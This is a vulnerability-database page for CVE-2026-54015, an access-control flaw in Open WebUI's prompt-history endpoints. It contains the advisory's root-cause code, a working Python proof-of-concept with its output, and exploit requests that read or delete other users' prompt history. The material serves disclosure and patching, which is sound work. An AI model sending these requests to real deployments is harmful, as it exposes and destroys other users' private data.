Skip to main content

Open WebUI EUVDEUVD-2026-38527

| CVE-2026-54015 MEDIUM
Improper Access Control (CWE-284)
2026-06-17 https://github.com/open-webui/open-webui GHSA-4r4w-2wgp-w7cj
6.4
CVSS 3.1 · Vendor: https://github.com/open-webui/open-webui
Share

Severity by source

Vendor (https://github.com/open-webui/open-webui) PRIMARY
6.4 MEDIUM
AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:L
vuln.today AI
6.4 MEDIUM

Network-reachable HTTP API requires authenticated low-privilege access and prior knowledge of victim UUID (AC:H); full snapshot read yields C:H; only history deletion (not live prompt) yields I:L/A:L.

3.1 AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:L
4.0 AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N

Primary rating from Vendor (https://github.com/open-webui/open-webui).

CVSS VectorVendor: https://github.com/open-webui/open-webui

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:L
Attack Vector
Network
Attack Complexity
High
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
Low
Availability
Low

Lifecycle Timeline

2
Source Code Evidence Fetched
Jun 18, 2026 - 01:51 vuln.today
Analysis Generated
Jun 18, 2026 - 01:51 vuln.today

DescriptionCVE.org

Summary

Open WebUI's prompt version-history endpoints authorize the prompt_id in the URL but then act on caller-supplied history IDs without verifying that the history row belongs to that prompt (history_entry.prompt_id == prompt.id). Three operations are affected:

  • GET /api/v1/prompts/id/{prompt_id}/history/diff - returns another prompt's history snapshots (read).
  • POST /api/v1/prompts/id/{prompt_id}/update/version - restores another prompt's snapshot into the caller's prompt, exposing its content (read).
  • DELETE /api/v1/prompts/id/{prompt_id}/history/{history_id} - deletes another prompt's history entry (delete).

An authenticated user with access to any prompt they control, plus a victim prompt_history.id, can read or delete another user's private prompt history. The single-entry read endpoint (GET .../history/{history_id}) already enforces the binding; these three did not.

Impact

Security boundary crossed: prompt confidentiality and integrity.

Prompt history snapshots can contain private prompt text, internal instructions, and sensitive variables. With a known victim prompt_history.id, an attacker can read another user's snapshot (via the diff endpoint or by restoring it into their own prompt) and delete another user's history entry. The active prompt row is not destroyed; the delete impact is against version history. Exploitation requires knowing or obtaining victim history UUIDs, so severity depends on adjacent ID exposure.

Root Cause

The route checks read access only for prompt_id:

python
# backend/open_webui/routers/prompts.py
prompt = await Prompts.get_prompt_by_id(prompt_id, db=db)
...
if not (
    user.role == 'admin'
    or prompt.user_id == user.id
    or await AccessGrants.has_access(
        user_id=user.id,
        resource_type='prompt',
        resource_id=prompt.id,
        permission='read',
        db=db,
    )
):
    raise HTTPException(...)

But the authorized prompt ID is not passed into the diff sink:

python
# backend/open_webui/routers/prompts.py
diff = await PromptHistories.compute_diff(from_id, to_id, db=db)

compute_diff() fetches both history entries globally by ID and returns their full snapshots:

python
# backend/open_webui/models/prompt_history.py
result_from = await db.execute(select(PromptHistory).filter(PromptHistory.id == from_id))
from_entry = result_from.scalars().first()
result_to = await db.execute(select(PromptHistory).filter(PromptHistory.id == to_id))
to_entry = result_to.scalars().first()
...
return {
    'from_snapshot': from_snapshot,
    'to_snapshot': to_snapshot,
    ...
}

There is no check that from_entry.prompt_id prompt_id or to_entry.prompt_id prompt_id.

The same missing binding affects two further endpoints. POST .../update/version restores a snapshot fetched globally by version_id:

python
# backend/open_webui/models/prompts.py - update_prompt_version
history_entry = await PromptHistories.get_history_entry_by_id(version_id, db=session)
...
prompt.content = snapshot.get('content', prompt.content)
# foreign snapshot copied into caller's prompt
prompt.version_id = version_id

DELETE .../history/{history_id} deletes an entry fetched globally by history_id:

python
# backend/open_webui/models/prompt_history.py - delete_history_entry
result = await db.execute(select(PromptHistory).filter_by(id=history_id))
entry = result.scalars().first()
...
await db.delete(entry)

Neither checks entry.prompt_id == prompt.id. The single-entry read endpoint (GET .../history/{history_id}) does (history_entry.prompt_id != prompt.id → 404); these three endpoints were missing it.

PoC

python
#!/usr/bin/env python3
"""
PoC for prompt history diff IDOR.

The PoC executes:
  - the real routers.prompts.get_prompt_diff() route function
  - the real PromptHistories.compute_diff() implementation

Fake model/DB adapters are used only to avoid requiring a running server. The
security-sensitive behavior under test is that the route authorizes the prompt
ID in the URL, then computes a diff for arbitrary history IDs without checking
that those history rows belong to the authorized prompt.
"""

from __future__ import annotations

import asyncio
import json
import os
import sys
import types
from pathlib import Path
from types import SimpleNamespace


def prepare_imports() -> None:
    repo_root = Path(__file__).resolve().parents[1]
    sys.path.insert(0, str(repo_root / "backend"))
    os.environ["VECTOR_DB"] = "none"

    class DummyTyper:
        def command(self, *args, **kwargs):
            return lambda fn: fn

    sys.modules.setdefault(
        "typer",
        types.SimpleNamespace(
            Typer=lambda *args, **kwargs: DummyTyper(),
            Option=lambda *args, **kwargs: None,
            echo=lambda *args, **kwargs: None,
            Exit=Exception,
        ),
    )
    sys.modules.setdefault("uvicorn", types.SimpleNamespace(run=lambda *args, **kwargs: None))


class FakeScalarResult:
    def __init__(self, row):
        self.row = row

    def first(self):
        return self.row


class FakeExecuteResult:
    def __init__(self, row):
        self.row = row

    def scalars(self):
        return FakeScalarResult(self.row)


class FakePromptHistoryDb:
    def __init__(self, rows):
        self.rows = rows
        self.calls = 0

    async def execute(self, stmt):
        row = self.rows[self.calls]
        self.calls += 1
        return FakeExecuteResult(row)


class FakeDbContext:
    def __init__(self, db):
        self.db = db

    async def __aenter__(self):
        return self.db

    async def __aexit__(self, exc_type, exc, tb):
        return False


async def run_real_compute_diff(from_id: str, to_id: str):
    import open_webui.models.prompt_history as history_module

    victim_from = SimpleNamespace(
        id=from_id,
        prompt_id="victim-prompt",
        snapshot={
            "name": "Victim Prompt",
            "command": "/victim",
            "content": "PRIVATE_PROMPT_SECRET_V1",
        },
    )
    victim_to = SimpleNamespace(
        id=to_id,
        prompt_id="victim-prompt",
        snapshot={
            "name": "Victim Prompt",
            "command": "/victim",
            "content": "PRIVATE_PROMPT_SECRET_V2",
        },
    )

    fake_db = FakePromptHistoryDb([victim_from, victim_to])
    original_context = history_module.get_async_db_context
    try:
        history_module.get_async_db_context = lambda db=None: FakeDbContext(fake_db)
        diff = await history_module.PromptHistories.compute_diff(from_id, to_id)
    finally:
        history_module.get_async_db_context = original_context

    return diff


async def main() -> None:
    prepare_imports()

    import open_webui.routers.prompts as prompts_router

    attacker_prompt = SimpleNamespace(
        id="attacker-prompt",
        user_id="attacker",
    )
    attacker = SimpleNamespace(id="attacker", role="user")
    victim_from_id = "victim-history-from"
    victim_to_id = "victim-history-to"

    class FakePrompts:
        looked_up_prompt_ids = []

        async def get_prompt_by_id(self, prompt_id, db=None):
            self.looked_up_prompt_ids.append(prompt_id)
            if prompt_id == "attacker-prompt":
                return attacker_prompt
            return None

    class FakeAccessGrants:
        async def has_access(self, *args, **kwargs):
            return False

    class FakePromptHistories:
        compute_diff_calls = []

        async def compute_diff(self, from_id, to_id, db=None):
            self.compute_diff_calls.append(
                {
                    "from_id": from_id,
                    "to_id": to_id,
                    "authorized_prompt_id_not_passed": True,
                }
            )
            return await run_real_compute_diff(from_id, to_id)

    fake_prompts = FakePrompts()
    fake_histories = FakePromptHistories()

    original = {
        "Prompts": prompts_router.Prompts,
        "AccessGrants": prompts_router.AccessGrants,
        "PromptHistories": prompts_router.PromptHistories,
    }
    try:
        prompts_router.Prompts = fake_prompts
        prompts_router.AccessGrants = FakeAccessGrants()
        prompts_router.PromptHistories = fake_histories

        diff = await prompts_router.get_prompt_diff(
            prompt_id="attacker-prompt",
            from_id=victim_from_id,
            to_id=victim_to_id,
            user=attacker,
            db=None,
        )
    finally:
        for name, value in original.items():
            setattr(prompts_router, name, value)

    result = {
        "confirmed": (
            diff.get("from_snapshot", {}).get("content") == "PRIVATE_PROMPT_SECRET_V1"
            and diff.get("to_snapshot", {}).get("content") == "PRIVATE_PROMPT_SECRET_V2"
            and fake_prompts.looked_up_prompt_ids == ["attacker-prompt"]
            and fake_histories.compute_diff_calls
            and fake_histories.compute_diff_calls[0]["authorized_prompt_id_not_passed"] is True
        ),
        "attacker_user_id": "attacker",
        "authorized_prompt_id": "attacker-prompt",
        "victim_prompt_id": "victim-prompt",
        "victim_history_ids": [victim_from_id, victim_to_id],
        "prompt_ids_authorized_by_route": fake_prompts.looked_up_prompt_ids,
        "compute_diff_calls": fake_histories.compute_diff_calls,
        "leaked_from_snapshot": diff.get("from_snapshot"),
        "leaked_to_snapshot": diff.get("to_snapshot"),
        "source": {
            "route": "backend/open_webui/routers/prompts.py:get_prompt_diff",
            "sink": "backend/open_webui/models/prompt_history.py:PromptHistories.compute_diff",
        },
    }
    print(json.dumps(result, indent=2, sort_keys=True))
    if not result["confirmed"]:
        raise SystemExit(1)


if __name__ == "__main__":
    asyncio.run(main())

The PoC executes the real route function and the real PromptHistories.compute_diff() implementation with fake model/DB adapters. It authorizes the attacker against attacker-prompt, then supplies two victim history IDs. The route returns the victim prompt snapshots.

Result:

json
{
  "attacker_user_id": "attacker",
  "authorized_prompt_id": "attacker-prompt",
  "confirmed": true,
  "leaked_from_snapshot": {
    "command": "/victim",
    "content": "PRIVATE_PROMPT_SECRET_V1",
    "name": "Victim Prompt"
  },
  "leaked_to_snapshot": {
    "command": "/victim",
    "content": "PRIVATE_PROMPT_SECRET_V2",
    "name": "Victim Prompt"
  },
  "prompt_ids_authorized_by_route": [
    "attacker-prompt"
  ],
  "victim_history_ids": [
    "victim-history-from",
    "victim-history-to"
  ],
  "victim_prompt_id": "victim-prompt"
}

Exploit Sketch

Read via the diff endpoint:

  1. Attacker has read access to ATTACKER_PROMPT_ID.
  2. Attacker knows two history IDs for a victim prompt: VICTIM_FROM_HISTORY_ID and VICTIM_TO_HISTORY_ID.
  3. Attacker requests:
text
GET /api/v1/prompts/id/ATTACKER_PROMPT_ID/history/diff?from_id=VICTIM_FROM_HISTORY_ID&to_id=VICTIM_TO_HISTORY_ID
  1. The server authorizes ATTACKER_PROMPT_ID, then returns snapshots for the victim history IDs.

Read via restore (update/version): the attacker POSTs {"version_id": "VICTIM_HISTORY_ID"} to their own prompt's update/version, then GETs their prompt; it now holds the victim snapshot's name/content/data/meta/tags.

Delete: the attacker sends DELETE /api/v1/prompts/id/ATTACKER_PROMPT_ID/history/VICTIM_HISTORY_ID; the victim history entry is removed.

Recommended Fix

Bind every prompt-history operation to the authorized prompt before acting on a history ID, mirroring the single-entry read endpoint:

  • compute_diff() should accept prompt_id and query both entries with PromptHistory.prompt_id == prompt_id alongside the id filter.
  • delete_history_entry() should accept prompt_id and filter filter_by(id=history_id, prompt_id=prompt_id).
  • update_prompt_version() should reject history_entry.prompt_id != prompt_id before restoring.

Return 404/403 on mismatch.

Consolidation

Per our Report Handling policy this consolidates independent reports of the same prompt-history authorization flaw (one missing history_entry.prompt_id == prompt.id binding) reached through different endpoints:

  • Diff-endpoint read and history deletion: @0xEr3n (earliest filings).
  • update/version restore-read: distinct path demonstrated by @5yu4n.

One CVE for the consolidated advisory.

AnalysisAI

Insecure Direct Object Reference in Open WebUI's prompt version-history API (versions ≤ 0.9.5) allows authenticated users to read or delete other users' private prompt history entries. Three endpoints authorize the URL-supplied prompt_id but pass caller-controlled history_id values to model-layer functions without verifying the history row belongs to the authorized prompt - a binding enforced correctly in a fourth endpoint but absent in these three. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Authenticate as low-privilege Open WebUI user
Delivery
Obtain victim prompt_history UUID via side-channel enumeration
Exploit
Send GET /history/diff with victim history IDs under own authorized prompt_id
Execution
Server authorizes own prompt_id, bypasses history-to-prompt binding check
Impact
Receive full victim prompt snapshots including private content

Vulnerability AssessmentAI

Exploitation Three concrete prerequisites must all be met: (1) The attacker must be an authenticated Open WebUI user with PR:L - unauthenticated exploitation is not possible. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The published CVSS 6.4 (AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:L) is well-calibrated. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An authenticated attacker who owns any prompt in the system first obtains a victim user's `prompt_history` UUID through a side channel (e.g., API response logging, a separate enumeration endpoint). The attacker then issues `GET /api/v1/prompts/id/ATTACKER_PROMPT_ID/history/diff?from_id=VICTIM_FROM_HISTORY_ID&to_id=VICTIM_TO_HISTORY_ID`; the server authorizes `ATTACKER_PROMPT_ID` and returns both victim prompt snapshots in full, including private content and internal instructions. …
Remediation Upgrade open-webui to version 0.9.6, confirmed as the patched release by the GitHub Security Advisory GHSA-4r4w-2wgp-w7cj (https://github.com/open-webui/open-webui/security/advisories/GHSA-4r4w-2wgp-w7cj). … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

More in Python

View all
CVE-2025-24016 CRITICAL POC
9.9 Feb 10

Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t

CVE-2025-27520 CRITICAL POC
9.8 Apr 04

BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser

CVE-2025-2945 CRITICAL POC
9.9 Apr 03

pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi

CVE-2013-5093 MEDIUM POC
6.8 Sep 27

The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python

CVE-2025-32375 CRITICAL POC
9.8 Apr 09

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica

CVE-2014-0224 HIGH POC
7.4 Jun 05

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph

CVE-2024-21644 HIGH POC
7.5 Jan 08

pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.

CVE-2017-9462 HIGH POC
8.8 Jun 06

In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2024-21645 MEDIUM POC
5.3 Jan 08

pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne

CVE-2026-33017 CRITICAL POC
9.3 Mar 17

Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301

CVE-2026-55255 HIGH POC
8.4 Jun 19

Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing

Share

EUVD-2026-38527 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy